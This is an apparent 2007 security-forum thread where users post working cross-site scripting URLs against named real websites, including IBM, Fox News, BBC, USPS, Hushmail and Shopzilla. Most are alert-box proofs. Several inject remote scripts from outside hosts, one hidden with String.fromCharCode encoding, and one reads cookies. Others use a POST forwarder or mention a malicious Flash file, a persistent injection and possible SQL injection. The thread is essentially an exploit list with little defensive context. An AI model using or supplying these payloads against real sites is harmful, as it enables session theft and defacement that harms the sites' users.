http://www.dnsstuff.com/tools/obfuscated.ch?ip=http%3A%2F%2F%3Cbody%20onload=alert(%22XSS%22)%3E%3Afdsa%40127.0.0.0x01.%2F

http://spoof.wtfrpg.com/user-add.html?RefererCode=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&NoS=true

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.facebook.com/editnotes.php&blog_url=%22%3E%3Cscript%3Ealert(455)%3C/script%3E

Edit: I just noticed it only works if you are already logged in



Edited 1 time(s). Last edit at 04/06/2007 03:43PM by thornmaker.

Three Anticlown Media sites using the same software.

http://thesuperficial.com/image.php?path="><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,97,119,101,115,111,109,101,97,110,100,114,101,119,46,110,101,116,47,102,100,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

http://www.iwatchstuff.com/image.php?path="><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,97,119,101,115,111,109,101,97,110,100,114,101,119,46,110,101,116,47,102,100,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

http://www.hedonistica.com/image.php?path="><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,97,119,101,115,111,109,101,97,110,100,114,101,119,46,110,101,116,47,102,100,47,120,115,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

hxxp://www.hedonistica.com/yt.php?path=http://yoursite.com/malicious.swf


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

http://www.research.att.com/areas/visualization/papers_videos/subpage.php?page=--%3E%3Cscript%3Ealert(1234)%3C/script%3Epapers/books.html&title=Papers%20by%20Year

http://businessblog.sprint.com/1/1/%22%3E%3Cscript%3Ealert(1234)%3C/script%3E/09/12/Vicki-2.html?page=trackback&smm=

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://mailserver5.hushmail.com/hushmail/index.php&hush_exitpage=https://www.hushmail.com/welcome-upgrade&hush_welcomepage=https://mailserver7.hushmail.com/hushmail/index.php&hush_exittarget=_top&hush_newaccount=true&hush_exitmethod=post&linkID=493&affiliateID=&httpReferrer=http://www.hushmail.com&hush_customerid=0123456789012345&hush_username=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Note: this is similar to one kyran posted back on 01.Dec.2006 (page 32) though that one seems to be fixed. Also, this one fires if and only if the hush_customerid parameter is 16 characters... kinda strange.

Edit: fixed date. thanks kyran



Edited 1 time(s). Last edit at 04/10/2007 04:31PM by thornmaker.

http://green.asus.com/english/search.asp?q=XSS%3Cscript%3Ealert(42)%3C/script%3E

replace 42 by 'whatever' and you have SQL injection

http://www-307.ibm.com/pc/support/site.wss/quickPath.do?quickPathEntry=11%3Cscript%20src=//ha.ckers.org/s.js%3E%3C/script%3E&quickPathEntry.x=0&quickPathEntry.y=0

works if RSnake get the time to copy s.js to S.JS ;-)

maxdata.com http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.maxdata.com/extras/contact/index.jsp&contactName=%27%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

http://www.btplc.com/News/NewsListings/Searchnews.cfm?criteria=42%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

probably SQL injection too ...

[www.sap.com]
[www.sap.com]
[www.sap.com]



Edited 2 time(s). Last edit at 04/07/2007 02:07PM by trev.

http://www.mrmovietimes.com/movies/Blades-of-Glory.html?zip=01010&distance=5+miles&date=0%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Yeah I was THAT bored.
:P

lawlerskates and lmao missielz
http://www.r0xes.net / http://www.7na.org

http://www.coffer.com/mac_find/?string=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.di.fm/pro/sendpass.php?login=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.jumperz.net/index.php?i=1&a=2'%3Cscript%3Ealert(1)%3C/script%3E (maker of http://guardian.jumperz.net/index.html )
http://www.jiwire.com/dbsight/search.do?indexName=jiwire&templateName=JiWireSearch&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.randomchaos.com/documents/?source=scott_reynen_politic%22%3E%3Cbody%20onload=alert(1)%20x=%22
http://www.phonescoop.com/search/jump_search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&j.x=0&j.y=0

thornmaker Wrote:
-------------------------------------------------------
>
> Note: this is similar to one kyran posted back on
> 01.Dec.2007 (page 32) though that one seems to be
> fixed. Also, this one fires if and only if the
> hush_customerid parameter is 16 characters...
> kinda strange.

I can XSS into the future?!

- Kyran

http://www.shopzilla.com/buy/superfind.xpml?search_box=1&sfsk=0&cat_id=1&keyword=%22>%3Cscript%3Ealert('+security')%3B%3C%2Fscript%3E+book&SEARCH_GO=Go!

http://www.shopzilla.com/5H_-_page_title--%3Cscript%3Ealert('xss');%3C/script%3Einsecurely.__page_token--8C

https://www.shopzilla.com/mybizrate/login.xpml?errmsg=%3Cscript%3Ealert('xss');%3C/script%3E

It was actually kind of hard to find areas of the site that weren't vulnerable...

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/12/2007 03:35AM by tx.

.mario Wrote:
-------------------------------------------------------
> Maybe it would also make sense to post a poc which
> works with an inclusion - an alert proofs
> nothing.
>
> What do you think?


The fact that javascript is executed says a lot. Maybe this discussion is more appropriate in a seperate thread. What do you think?

news:
http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=story&getfields=*&filter=0&sort=date%3AD%3AS%3Ad1&q=%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&qstr=&realm=fnc&random=
http://newsforums.bbc.co.uk/nol/thread.jspa?threadID=5734%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&&&edition=1&ttl=20070312035200
http://search.us.reuters.com/news/search.aspx?blob=%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E&WTmodLoc=ussrch-top-quote
http://www.timesonline.co.uk/tol/sitesearch.do?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&hitsperpage=10&nextOffset=0&offset=0&leftStartIndex=1&leftEndIndex=10&submitStatus=searchFormSubmitted&mode=SIMPLE&sectionId=3461

misc:
http://www.nokiausa.com/index/1,7905,,00.html?ref=%22;alert('xss');// (hei tiimo)
http://zip4.usps.com/zip4/zcl_1_landing_error.jsp?city=FOO&state=%22%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

Funny persistent XSS: [www.jugtrento.org]

After that you go to http://www.jugtrento.org/trewiki/index.php/logs/access and enjoy.

Somebody should tell the Yahoo guys that you don't leave debug code in production version. Never. It seems they haven't heard of that rule yet because debug code is everywhere. And here is what you get then:

[new.photos.yahoo.com]

https://admin.he.net/index.cgi?user=&auth=&menu=main&account=%3Cscript%3Ealert%280%29%3C%2Fscript%3E bleh =oP Hurricane Electric customer login page.

@kirke - I did cp s.js to S.JS so you can use that going forward if the site requires/forces uppercase.

- RSnake
Gotta love it. http://ha.ckers.org

Thanks RSnake.

previous example seems to be fixed, anyway, here's a new one:

http://www-307.ibm.com/pc/support/site.wss/product.do?template=%22%20%3E%3Cscript%20src=//ha.ckers.org/s.js%3E%3C/script%3E%2Fproductselection%2Flandingpages%2FbrowseByProductLandingPage.vm&sitestyle=lenovo&brandind=11&validate=true

Interesting results:

http://netsecurity.about.com/sitesearch.htm?terms=%3Ca%20href=http://www.sumitsays.com/public/images/thomson_and_thompson.jpg%3E%3Cimg%20src=http://www.iisg.nl/~landsberger/images/cr02.jpg%20height=500%20width=380%3E%3Cbr%3E%3Cbr%3E%3Cp%3ESpecial%20Offer%20baby%3Cbr%3E%3Cbr%3E&SUName=netsecurity&TopNode=4694&type=1

there were more but I think it makes the point

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.kevinmitnick.com/contact.php?contactMList=1&strFirstName=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&strLastName=&strCompanyName=&strAddr1=&strAddr2=&strCity=&strState=&strCountry=&strZip=&strPhone=&strFax=&strEmail=&strNote=&zzhpSession=2007041600291507e19f78d340873ef8417b72fdbf8b3e&zzhpClearText=&submit=Submit

ouch, got to hurt.

ironic isn't it? =oP
http://www-1.ibm.com/support/docview.wss?rs=%3Czzz1%3E2338&context=%3Czzz2%3ESSYSVG&dc=%3Czzz3%3EDB520&uid=swg21233077&loc=%22%3E%3Cbody%20onload=alert(1)%20x=%22en_US&cs=UTF-8&lang=en&rss=%3Czzz5%3Ect2338lotus

http://www.zend.com/code/search_code_author.php?author=%3Cscript%3Ealert(1)%3C/script%3E

http://www.europeanexperts.org/disp_zone.html?id_zone=2'<script>alert(1)</script>=1&lazone=PHP

http://www.hollywoodpoker.com/process_signup.html?nickname=a"><script>alert(document.cookie)</script>aa&email=b&password1=a&password2=a&promocode=&submit=Sign+Up

-------------------------------
http://fr3dc3rv.blogspot.com

Domain name appraisals' site. They convert every character to lowercase, strip out any HTTP references, and then echo it. I got bored playing with it so here:
http://www.leapfish.com/domain_name_appraisal.php?url=<xmp>


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Heh? Them stripping out http:// is pretty easy to work around:

[www.leapfish.com]